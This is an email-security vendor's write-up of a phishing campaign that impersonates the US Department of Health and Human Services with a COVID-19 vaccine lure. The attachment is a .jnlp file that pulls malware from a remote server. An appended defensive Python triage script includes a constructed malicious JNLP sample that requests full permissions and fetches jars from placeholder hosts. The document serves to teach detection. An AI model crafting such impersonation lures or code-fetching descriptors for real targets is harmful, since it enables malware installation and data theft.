COVID-19 Vaccine Tracker - Abnormal Security

COVID-19 Vaccine Tracker

In this attack, attackers impersonate the US Department of Health and Human Services in order to install malware on employees’ devices.

Quick Summary of Attack Target

Platform: Office 365
Email Security Bypassed: Ironport
Mailboxes: 50,000 to 70,000
Payload: Java Network Launch Protocol (.jnlp) Attachment
Technique: Impersonation

What was the attack?

Setup: The COVID-19 pandemic continues to cause widespread distress, meaning any news of a vaccine is likely to pique the interest of recipients.

Email Attack: The attacker has altered their display name to appear as ‘health & human services’ and includes ‘U.S. Department of Health & Human Services|HHS]’ [sic] in their signature in order to appear as a trustworthy source. This attack targets all employees at an organization; the email claims that the attached file contains information on vaccines in trial and where to receive vaccines nearby.

Payload: This attack’s payload is in the attachment of the email. If the recipient downloads and runs the file (.jnlp – Java Network Launch Protocol format), they are at risk of installing malware.

Result: If the recipients fall for this attack, they are at risk of losing control of their device as well as allowing attackers to access sensitive personal and organizational information.

Why is this attack effective?

Relevance: As the world continues to tackle COVID-19, vaccines are touted as the ‘cure-all’ for the pandemic. As a result, this email attack preys on individuals’ concerns and inherent curiosity, making it more likely that they will engage with the attack.

Impersonation: The attacker impersonates the US Department of Health and Human Services. Employees are more likely to engage and download an attachment from a ‘trustworthy, known’ source.

Undetected by Antivirus: The attached .jnlp file is a vehicle for the malware attack. A .jnlp file is not itself an executable; it is an XML descriptor that instructs Java Web Start to download and launch a Java program from a remote server, which then installs malware on the victim’s device. Because the attachment contains no malicious code of its own, it returns as safe when run through VirusTotal – these types of attacks are especially dangerous since they can bypass antivirus software.
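As an added example (not from Abnormal Security’s writeup), the following shows what a mail gateway can do with such an attachment even when antivirus reports it clean: parse the JNLP descriptor and decide on quarantine based on what it would make Java Web Start fetch and run. The sample descriptor, host names and approved-host list are constructed for illustration and are not indicators from this attack.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urljoin, urlparse

# Constructed sample descriptor modelled on the lure; hosts are placeholders, not real indicators.
SAMPLE_JNLP = b"""<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0+" codebase="http://lure-host.invalid/vaccine/" href="tracker.jnlp">
  <information>
    <title>COVID-19 Vaccine Tracker</title>
    <vendor>U.S. Department of Health &amp; Human Services</vendor>
  </information>
  <security><all-permissions/></security>
  <resources>
    <jar href="tracker.jar" main="true"/>
    <jar href="https://cdn.example.invalid/lib/helper.jar"/>
  </resources>
  <application-desc main-class="com.example.Tracker"/>
</jnlp>
"""

def analyze_jnlp(data: bytes) -> dict:
    """Return what Java Web Start would fetch and run if this descriptor were opened.
    ElementTree is used for brevity; prefer defusedxml when parsing untrusted mail."""
    root = ET.fromstring(data)
    if root.tag != "jnlp":
        raise ValueError("not a JNLP descriptor")
    codebase = root.get("codebase", "")
    # Relative jar hrefs resolve against codebase, so every jar is a remote download.
    jars = [urljoin(codebase, j.get("href", "")) for j in root.iter("jar")]
    app = root.find("application-desc")
    return {
        "title": root.findtext("information/title", ""),
        "vendor": root.findtext("information/vendor", ""),
        "codebase": codebase,
        "jars": jars,
        "hosts": sorted({urlparse(u).hostname for u in jars if urlparse(u).hostname}),
        "all_permissions": root.find("security/all-permissions") is not None,
        "main_class": app.get("main-class", "") if app is not None else "",
    }

def triage(report: dict, approved_hosts: set) -> list:
    """Reasons to quarantine, independent of whether the attachment's bytes match an AV signature."""
    reasons = []
    if report["all_permissions"]:
        reasons.append("requests all-permissions (runs outside the Java sandbox)")
    for host in report["hosts"]:
        if host not in approved_hosts:
            reasons.append(f"downloads code from unapproved host {host}")
    for url in report["jars"]:
        if url.startswith("http://"):
            reasons.append(f"fetches jar over plaintext HTTP: {url}")
    return reasons
```

The extracted hosts and jar URLs are the artefacts worth logging and blocking at the proxy, since the attachment itself carries nothing for signature-based scanning to match.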
